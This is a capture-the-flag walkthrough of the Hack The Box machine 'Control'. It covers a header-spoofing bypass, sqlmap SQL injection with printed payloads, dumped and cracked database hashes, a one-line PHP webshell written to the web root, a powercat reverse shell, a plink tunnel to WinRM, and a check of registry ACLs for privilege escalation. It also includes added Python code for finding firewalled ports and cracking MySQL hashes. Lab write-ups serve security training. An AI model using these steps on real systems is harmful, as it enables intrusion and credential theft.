As always, we start with an nmap scan:
# Nmap 7.80 scan initiated Fri Jan 3 10:25:07 2020 as: nmap -sC -sV -oA control-nmap 10.10.10.167
Nmap scan report for 10.10.10.167
Host is up (0.033s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Fidelity
135/tcp  open  msrpc   Microsoft Windows RPC
3306/tcp open  mysql?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, HTTPOptions, Help, Kerberos, LDAPSearchReq, LPDString, RPCCheck, RTSPRequest, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe:
|_    Host '10.10.16.70' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.80%I=7%D=1/3%Time=5E0F5CE5%P=x86_64-pc-linux-gnu%r(HTT
SF:POptions,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2
SF:ookie,4A,"F\0\0\x01\xffj\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x2\x04Host\x20'10\.10\.16\.70'\x20is\x20not\x20allowed\x20to\x20conne
SF:ct\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Jan 3 10:25:32 2020 -- 1 IP address (1 host up) scanned in 25.52 seconds
The website on the default HTTP port is titled "Fidelity".
It has four pages: index, about, admin and login. The admin and login pages show no login form, only the error "Access Denied: Header Missing. Please ensure you go through the proxy to access this page". That points to a header-based check rather than real authentication, so I went through the source code.
The source of index.php contains a commented-out To-Do list:
<!-- To Do:
Import Products
Link to new payment system
Enable SSL (Certificates location \\192.168.4.28\myfiles)
-->
<!-- Header -->
This reveals an internal IP address, 192.168.4.28. I fired up Burp to look at the requests being sent and received.
Burp showed nothing unusual in the request itself, and requesting admin.php or login.php directly gives the same error.
The message "go through the proxy" means the application checks for a header that a reverse proxy would normally add, and X-Forwarded-For is the obvious candidate. Since the check trusts whatever value the client supplies, it is no access control at all: I can add the header myself in Burp. I used 192.168.4.28 as the value, because it is the only internal IP found in the page source, and it worked:
X-Forwarded-For: 192.168.4.28
As soon as I forwarded the modified request in Burp, the admin panel (a product page) loaded.
SQLi
The admin page has a product search, so the next step was to look for SQL injection there. I captured the search request in Burp so I could hand it to sqlmap. The request:
POST /search_products.php HTTP/1.1
Host: 10.10.10.167
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.10.167/admin.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 26
X-Forwarded-For: 192.168.4.28
Connection: close
Upgrade-Insecure-Requests: 1

productName=D-Link+DWA-171
I saved the request as control.txt and ran sqlmap on it, with --all to retrieve everything it can and --batch to accept the default answers: sqlmap --all -r control.txt --batch
root@kali:~/htb/control# sqlmap --all -r control.txt --batch
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.12.1#dev}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 14:14:03 /2019-12-07/
[14:14:03] [INFO] parsing HTTP request from ‘control.txt’
[14:14:04] [INFO] testing connection to the target URL
[14:14:05] [INFO] testing if the target URL content is stable
[14:14:05] [INFO] target URL content is stable
[14:14:05] [INFO] testing if POST parameter ‘productName’ is dynamic
[14:14:05] [WARNING] POST parameter ‘productName’ does not appear to be dynamic
[14:14:05] [INFO] heuristic (basic) test shows that POST parameter ‘productName’ might be injectable (possible DBMS: ‘MySQL’)
[14:14:06] [INFO] heuristic (XSS) test shows that POST parameter ‘productName’ might be vulnerable to cross-site scripting (XSS) attacks
[14:14:06] [INFO] testing for SQL injection on POST parameter ‘productName’
it looks like the back-end DBMS is ‘MySQL’. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for ‘MySQL’ extending provided level (1) and risk (1) values? [Y/n] Y
[14:14:06] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause’
[14:14:08] [INFO] testing ‘Boolean-based blind – Parameter replace (original value)’
[14:14:09] [INFO] testing ‘AND boolean-based blind – WHERE or HAVING clause (MySQL comment)’
[14:14:17] [INFO] testing ‘OR boolean-based blind – WHERE or HAVING clause (MySQL comment)’
[14:14:18] [WARNING] reflective value(s) found and filtering out
[14:14:19] [INFO] POST parameter ‘productName’ appears to be ‘OR boolean-based blind – WHERE or HAVING clause (MySQL comment)’ injectable (with –string=”36“)
[14:14:19] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (BIGINT UNSIGNED)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)’
[14:14:19] [INFO] testing ‘MySQL >= 5.5 OR error-based – WHERE or HAVING clause (EXP)’
[14:14:19] [INFO] testing ‘MySQL >= 5.7.8 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)’
[14:14:20] [INFO] testing ‘MySQL >= 5.7.8 OR error-based – WHERE or HAVING clause (JSON_KEYS)’
[14:14:20] [INFO] testing ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’
[14:14:20] [INFO] POST parameter ‘productName’ is ‘MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)’ injectable
[14:14:20] [INFO] testing ‘MySQL inline queries’
[14:14:20] [INFO] testing ‘MySQL >= 5.0.12 stacked queries (comment)’
[14:14:31] [INFO] POST parameter ‘productName’ appears to be ‘MySQL >= 5.0.12 stacked queries (comment)’ injectable
[14:14:31] [INFO] testing ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’
[14:14:41] [INFO] POST parameter ‘productName’ appears to be ‘MySQL >= 5.0.12 AND time-based blind (query SLEEP)’ injectable
[14:14:41] [INFO] testing ‘Generic UNION query (NULL) – 1 to 20 columns’
[14:14:41] [INFO] testing ‘MySQL UNION query (NULL) – 1 to 20 columns’
[14:14:41] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[14:14:42] [INFO] ‘ORDER BY’ technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[14:14:43] [INFO] target URL appears to have 6 columns in query
[14:14:43] [INFO] POST parameter ‘productName’ is ‘MySQL UNION query (NULL) – 1 to 20 columns’ injectable
[14:14:43] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'productName' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 86 HTTP(s) requests:
---
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-6916' OR 8776=8776#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=D-Link DWA-171' AND (SELECT 3579 FROM(SELECT COUNT(*),CONCAT(0x7171706b71,(SELECT (ELT(3579=3579,1))),0x7176786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- EOXk

    Type: stacked queries
    Title: MySQL >= 5.0.12 stacked queries (comment)
    Payload: productName=D-Link DWA-171';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=D-Link DWA-171' AND (SELECT 8534 FROM (SELECT(SLEEP(5)))nDKy)-- xWso

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=D-Link DWA-171' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7171706b71,0x524d51445050564746647064625a4359716b4f4a7853434262624572596a424b5a65535962454f57,0x7176786b71),NULL,NULL#
---
[14:14:43] [INFO] the back-end DBMS is MySQL
[14:14:43] [INFO] fetching banner
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0
banner: ‘10.4.8–MariaDB‘
[14:14:44] [INFO] fetching current user
current user: ‘manager@localhost‘
[14:14:44] [INFO] fetching current database
current database: ‘warehouse‘
[14:14:44] [INFO] fetching server hostname
hostname: ‘Fidelity‘
[14:14:45] [INFO] testing if current user is DBA
[14:14:45] [INFO] fetching current user
current user is DBA: False
[14:14:45] [INFO] fetching database users
database management system users [6]:
[*] ‘hector‘@’localhost‘
[*] ‘manager‘@’localhost‘
[*] ‘root‘@’127.0.0.1‘
[*] ‘root‘@’::1‘
[*] ‘root‘@’fidelity‘
[*] ‘root‘@’localhost‘
[14:14:45] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] Y
[14:14:46] [INFO] using hash method ‘mysql_passwd‘
what dictionary do you want to use?
[1] default dictionary file ‘/usr/share/sqlmap/data/txt/wordlist.tx_‘ (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[14:14:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[14:14:46] [INFO] starting dictionary-based cracking (mysql_passwd)
[14:14:46] [INFO] starting 2 processes
[14:16:19] [INFO] cracked password ‘l3tm3!n‘ for user ‘manager‘
database management system users password hashes:
[*] hector [1]:
password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
clear–text password: l3tm3!n
[*] root [1]:
password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
sqlmap dumped the MySQL user table, which is what I was after: password hashes for hector, manager and root. Its built-in dictionary attack recovered manager's password, l3tm3!n; hector's and root's hashes stayed uncracked for now.
A MySQL password on its own does not get me in: port 3306 only accepts local connections (nmap already showed "Host ... is not allowed to connect to this MariaDB server"), and nothing else is exposed. The route is to turn the SQLi into code execution. sqlmap found stacked queries, and if the database user is allowed to write files (the MySQL FILE privilege) and the IIS web root is writable, sqlmap's --file-write can drop a PHP webshell straight into C:\Inetpub\wwwroot. I looked at several ways of doing this by hand through Burp, but the simplest is to let sqlmap do it:
root@kali:~/htb/control# cat s2.php
<?php echo shell_exec($_GET["cmd"]); ?>
root@kali:~/htb/control# sqlmap -r req --dbms mysql --file-write=s2.php --file-dest="C:/Inetpub/wwwroot/s2.php"
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.8#stable}
|_ -| . [)]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:03:32 /2020-02-27/

[03:03:32] [INFO] parsing HTTP request from 'req'
[03:03:32] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: productName (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: productName=-4687' OR 8277=8277#

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: productName=blah' AND (SELECT 1098 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT (ELT(1098=1098,1))),0x717a717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- SQcG

    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (comment)
    Payload: productName=blah';SELECT SLEEP(5)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: productName=blah' AND (SELECT 7645 FROM (SELECT(SLEEP(5)))VIiw)-- ZBOf

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: productName=blah' UNION ALL SELECT NULL,CONCAT(0x716b6b7671,0x7474516e41764359637658616b4e77796557634a77594f6d7a4247674e4c5476696b6e4644446964,0x717a717171),NULL,NULL,NULL,NULL#
---
[03:03:32] [INFO] testing MySQL
[03:03:33] [INFO] confirming MySQL
[03:03:33] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 10 or 2016
web application technology: Microsoft IIS 10.0, PHP 7.3.7
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[03:03:33] [INFO] fingerprinting the back-end DBMS operating system
[03:03:33] [INFO] the back-end DBMS operating system is Windows
[03:03:34] [WARNING] potential permission problems detected ('Access denied')
[03:03:34] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
do you want confirmation that the local file 's2.php' has been successfully written on the back-end DBMS file system ('C:/Inetpub/wwwroot/s2.php')? [Y/n] y
[03:03:46] [INFO] the local file 's2.php' and the remote file 'C:/Inetpub/wwwroot/s2.php' have the same size (41 B)
[03:03:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/10.10.10.167'
[03:03:46] [WARNING] you haven't updated sqlmap for more than 208 days!!!

[*] ending @ 03:03:46 /2020-02-27/

root@kali:~/htb/control#
POWERCAT REVERSE SHELL
Now I need a reverse connection from the Control machine. Since the target is Windows, a PowerShell reverse shell is the natural choice, and after a fair amount of reading I settled on powercat.
Setup:
- Download powercat.ps1 to the working directory
- Serve it with a Python HTTP server: python -m SimpleHTTPServer 8081
- Start a netcat listener: nc -lvnp 8080
- Finally, trigger it through the webshell so the box fetches powercat.ps1 and connects back (the transcript below is from a later session, where the HTTP server ran on port 80 and the listener on 443)
The Activator:
ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/
root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.167 - - [27/Feb/2020 03:17:19] "GET /powercat.ps1 HTTP/1.1" 200 -

root@kali:~/htb/control# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50670
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot>whoami
whoami
nt authority\iusr
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is C05D–877F
Directory of C:\Users
11/05/2019 02:34 PM <DIR> .
11/05/2019 02:34 PM <DIR> ..
11/05/2019 02:34 PM <DIR> Administrator
11/01/2019 11:09 AM <DIR> Hector
10/21/2019 04:29 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 42,980,626,432 bytes free
C:\Users>cd Administrator
cd Administrator
Access is denied.
C:\Users>cd Hector
cd Hector
Access is denied.
I have a shell as nt authority\iusr, the IIS anonymous account, but it cannot enter either user directory. There are two users, Administrator and Hector, and both profiles deny access.
BUILDING THE TUNNEL: (THIS IS A FAILED STEP, PLEASE PROCEED TO ” WHITE WINTER WOLF WEBSHELL” SECTION)
I fired-up netstat -ano to see the processes running and listening.
C:\inetpub\wwwroot>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 792
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1904
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 456
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 332
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 948
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1784
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 592
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 584
TCP 10.10.10.167:80 10.10.14.21:35928 ESTABLISHED 4
TCP 10.10.10.167:49677 10.10.14.21:8080 ESTABLISHED 4632
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 792
TCP [::]:3306 [::]:0 LISTENING 1904
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 456
TCP [::]:49665 [::]:0 LISTENING 332
TCP [::]:49666 [::]:0 LISTENING 948
TCP [::]:49667 [::]:0 LISTENING 1784
TCP [::]:49668 [::]:0 LISTENING 592
TCP [::]:49669 [::]:0 LISTENING 584
UDP 0.0.0.0:123 *:* 1980
UDP 0.0.0.0:5353 *:* 1236
UDP 0.0.0.0:5355 *:* 1236
UDP 127.0.0.1:58934 *:* 948
UDP [::]:123 *:* 1980
UDP [::]:5353 *:* 1236
UDP [::]:5355 *:* 1236
C:\inetpub\wwwroot>
WinRM is running: TCP 5985 is LISTENING on every interface, owned by PID 4, i.e. http.sys inside the System process. Yet the nmap scan from outside showed 997 filtered ports and no 5985, so the Windows firewall is blocking it and I need a tunnel from Control back to my Kali box. I will use plink.exe, PuTTY's command-line SSH client, which Kali ships as a Windows binary: with -R 5985:127.0.0.1:5985 it makes port 5985 on Kali forward to WinRM on Control.
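To make the netstat-versus-nmap comparison repeatable, here is an added example (not part of the original write-up) that parses netstat -ano output and lists the TCP listeners nmap could not reach, i.e. host-firewalled services worth tunnelling. The netstat lines are a constructed subset of the listing above and the nmap set is the three ports from the scan; the plink string it attaches is only a suggested template, and the <attacker-ip> placeholder is mine.

```python
"""Compare what netstat shows listening on the box with what nmap could reach.

Added example, not code from the write-up. A TCP port that is LISTENING on
0.0.0.0 / [::] but was 'filtered' from the attacker's side is host-firewalled,
not absent, so it is a candidate for a plink/ssh -R tunnel.
"""
import re
from typing import Dict, List, Set

# Ports the nmap scan in the write-up found open from outside.
NMAP_OPEN: Set[int] = {80, 135, 3306}

# Constructed subset of the 'netstat -ano' output shown above.
NETSTAT_SAMPLE = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       792
  TCP    0.0.0.0:3306           0.0.0.0:0              LISTENING       1904
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING       4
  TCP    10.10.10.167:80        10.10.14.21:35928      ESTABLISHED     4
  TCP    [::]:5985              [::]:0                 LISTENING       4
  UDP    0.0.0.0:123            *:*                                    1980
"""

# Port labels used only for the report.
WELL_KNOWN = {
    80: "HTTP", 135: "MSRPC", 445: "SMB", 3306: "MySQL/MariaDB",
    3389: "RDP", 5985: "WinRM (HTTP)", 5986: "WinRM (HTTPS)", 47001: "WinRM/http.sys",
}

# Matches TCP LISTENING rows for both IPv4 (0.0.0.0:80) and IPv6 ([::]:80) sockets.
LINE_RE = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$")


def listening_tcp(netstat_output: str) -> Dict[int, int]:
    """Map every TCP port in LISTENING state to the PID that owns it."""
    ports: Dict[int, int] = {}
    for line in netstat_output.splitlines():
        m = LINE_RE.match(line)
        if m:
            ports[int(m.group(2))] = int(m.group(3))
    return ports


def tunnel_candidates(netstat_output: str, externally_open: Set[int]) -> List[dict]:
    """Listening TCP ports that were not reachable from outside, with a tunnel hint."""
    result = []
    for port, pid in sorted(listening_tcp(netstat_output).items()):
        if port in externally_open:
            continue
        result.append({
            "port": port,
            "pid": pid,
            "service": WELL_KNOWN.get(port, "unknown"),
            # PID 4 is the System process: the listener is a kernel driver (http.sys), not a user-mode exe.
            "kernel_http_sys": pid == 4,
            "plink": f"plink.exe -R {port}:127.0.0.1:{port} <attacker-ip>",
        })
    return result


if __name__ == "__main__":
    for c in tunnel_candidates(NETSTAT_SAMPLE, NMAP_OPEN):
        print(f"{c['port']:>5}  pid={c['pid']:<5} {c['service']:<16} {c['plink']}")
```

Running it on the sample reports 5985 and 47001, both owned by PID 4, as the firewalled listeners; 5985 is the one worth forwarding.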
root@kali:~/htb/control# locate plink.exe
/usr/share/windows-resources/binaries/plink.exe
Uploading PLink.exe
Now this seems to be a hard task for me. I tried following but I have an error:
Setup Python SMBServer
root@kali:~/impacket/examples# python smbserver.py ROPNOP /usr/share/windows-resources/binaries/
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.167,49680)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49680)
[*] Remaining connections []
[*] Incoming connection (10.10.10.167,49681)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49681)
[*] Remaining connections []
Copy PLink.exe using Command Prompt:
C:\inetpub\wwwroot\uploads>dir
dir
Volume in drive C has no label.
Volume Serial Number is C05D–877F
Directory of C:\inetpub\wwwroot\uploads
12/07/2019 07:00 PM <DIR> .
12/07/2019 07:00 PM <DIR> ..
11/11/2019 12:59 PM 6 rev.php
11/11/2019 12:59 PM 6 rev2.php
11/11/2019 12:59 PM 6 shell.php
12/07/2019 07:00 PM <DIR> test
3 File(s) 18 bytes
3 Dir(s) 43,625,472,000 bytes free
C:\inetpub\wwwroot\uploads>copy \\10.10.14.21\ROPNOP\usr\share\windows-resources\binaries\plink.exe
copy \\10.10.14.21\ROPNOP\usr\share\windows-resources\binaries\plink.exe
You can't connect to the file share because it's not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
WHITEWINTERWOLF WEBSHELL
So the polite way of copying plink.exe over SMB failed, badly enough that I shut the laptop and went to sleep. The error is Windows refusing SMB1: impacket's smbserver.py speaks SMB1 unless it is started with -smb2support, and a current Windows 10/2019 client will not talk to it. In my sleep the angels told me about the other route, WhiteWinterWolf's PHP webshell, which has a file-upload function. Here is what I did:
- I copied Webshell PHP script on to a file called “nshell.php”
- I used the same old resources text I used to run SQLMAP in my earlier step
- I ran sqlmap again to write the script into the web root, C:\inetpub\wwwroot\
My new SQLMAP script:
sqlmap -r control2.txt --file-write=/root/htb/control/nshell.php --file-dest=c:/inetpub/wwwroot/nshell.php
After running the SQLMAP, my new shell was successfully uploaded.
root@kali:~/htb/control# sqlmap -r control.txt --file-write=/root/htb/control/nshell.php --file-dest=c:/inetpub/wwwroot/nshell.php
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 03:29:32 /2020-02-27/

[03:29:32] [INFO] parsing HTTP request from 'control.txt'
    Type: error-based
    Type: stacked queries
    Type: time-based blind
    Type: UNION query

[*] ending @ 03:29:52 /2020-02-27/
As soon as sqlmap confirmed the upload, I opened the shell in the browser.
Through it I uploaded both nc.exe and plink.exe, so that at least one way of getting a connection out would work.
I tried plink.exe first: I know nc.exe will work, but I had not used plink for tunnelling before. Two things matter when running it from a non-interactive shell: the SSH login has to go on the command line (-l user -pw password), and on the first connection plink asks whether to trust Kali's host key, so that answer has to be piped in (echo y | plink.exe ...) because nothing is there to type it.
The first attempt came back with "Connection refused", meaning nothing was accepting on Kali's port 22 yet; with sshd running, the Kali login banner came back and the tunnel was up:
C:\inetpub\wwwroot\uploads>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.11
FATAL ERROR: Network error: Connection refused

Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64

The programs included with the Kali GNU/Linux system are free software;
The tunnel makes WinRM reachable from Kali on 127.0.0.1:5985, so I can point Evil-WinRM at localhost. I still only have the low-privileged web account, though; I need to log in as Hector. Recall that the first sqlmap run dumped three users' password hashes:
hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
sqlmap recovered manager's password in clear text, but Hector's was still unknown. These are MySQL's mysql_native_password hashes (SHA1 of SHA1 of the password, hex-encoded, prefixed with *), which john handles as --format=mysql-sha1; it cracked Hector's to l33th4x0rhector:
0e178792e8fc304a2e3133d535d38caf1da3cd9d:l33th4x0rhector
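Both cracking steps on this page (sqlmap's dictionary attack on the dumped hashes earlier, and john on Hector's hash here) rely on the same small construction, so here is an added example, not code from the write-up, sqlmap or john, that reproduces it offline in Python. The three hashes are copied from the sqlmap dump above; the wordlist is a constructed stand-in for sqlmap's default list and john's rules.

```python
"""Verify and crack MariaDB/MySQL 'mysql_native_password' hashes offline.

Added example (not code from the write-up, sqlmap or john). The format sqlmap
labels 'mysql_passwd' and john labels 'mysql-sha1' is
    '*' + uppercase hex of SHA1(SHA1(password))
so hashlib alone is enough to check a candidate password against a dump.
"""
import hashlib
from typing import Dict, Iterable

# Hashes exactly as sqlmap dumped them from mysql.user on Control (copied from the write-up).
DUMPED_HASHES: Dict[str, str] = {
    "hector":  "*0E178792E8FC304A2E3133D535D38CAF1DA3CD9D",
    "manager": "*CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA",
    "root":    "*0A4A5CAD344718DC418035A1F4D292BA603134D8",
}

# Constructed mini wordlist standing in for sqlmap's default list and john's rules.
WORDLIST = ["password", "letmein", "l3tm3!n", "hector", "l33th4x0rhector", "toor"]


def mysql_native_password(password: str) -> str:
    """Return the 41-character hash MySQL stores: '*' + HEX(SHA1(SHA1(pw)))."""
    stage1 = hashlib.sha1(password.encode("utf-8")).digest()  # raw bytes, not hex
    stage2 = hashlib.sha1(stage1).hexdigest().upper()
    return "*" + stage2


def crack(hashes: Dict[str, str], wordlist: Iterable[str]) -> Dict[str, str]:
    """Dictionary attack: {user: password} for every hash whose password is in the wordlist."""
    # Hash each candidate once and look every user up in the result: O(words + users).
    table = {mysql_native_password(word): word for word in wordlist}
    return {user: table[h.upper()] for user, h in hashes.items() if h.upper() in table}


if __name__ == "__main__":
    found = crack(DUMPED_HASHES, WORDLIST)
    for user, password in found.items():
        print(f"{user}: {password}")
    print("uncracked:", sorted(set(DUMPED_HASHES) - set(found)))
```

Because the scheme is an unsalted double SHA-1, one wordlist pass covers every user at once; that is why both sqlmap and john get through a dump like this so quickly.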
Time to run EvilWinRM as Hector: ( and getting user.txt )
GETTING ROOT
To get root I need to escalate from our current user, Hector. Two articles on Windows privilege escalation give a good overview of the approach; I had to read several of them before finding the right way to become Administrator on Control.
First, what is Hector allowed to do?
*Evil-WinRM* PS C:\Users\Hector\Desktop> whoami /priv
PRIVILEGES INFORMATION
———————————
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Is Hector in the Administrators group?
*Evil–WinRM* PS C:\Users\Hector\Desktop>
*Evil–WinRM* PS C:\Users\Hector\Desktop> net localgroup Administrators
net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
———————————————————————————————————————–
Administrator
The command completed successfully.
*Evil–WinRM* PS C:\Users\Hector\Desktop>
*Evil–WinRM* PS C:\Users\Hector\Desktop>
*Evil–WinRM* PS C:\Users\Hector\Desktop> cmdkey /list
cmdkey /list
Currently stored credentials:
* NONE *
*Evil–WinRM* PS C:\Users\Hector\Desktop>
cmdkey /list showed no stored credentials either. It was getting harder at this stage.
Checking ACLs is one of the most useful post-exploitation steps, because a write permission in the wrong place is very often the privesc path. Here I look at the service configuration keys under HKLM:\System\CurrentControlSet\Services: a user with FullControl (or SetValue) on a service's key can rewrite values such as ImagePath, i.e. decide which binary that service runs the next time it starts. The command, with findstr keeping only the lines that name Hector, the Users groups or the key path:
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
It returned a long list of service keys on which Hector has FullControl:
*Evil-WinRM* PS C:\Users\Hector\Desktop> get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Hector Users Path"
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
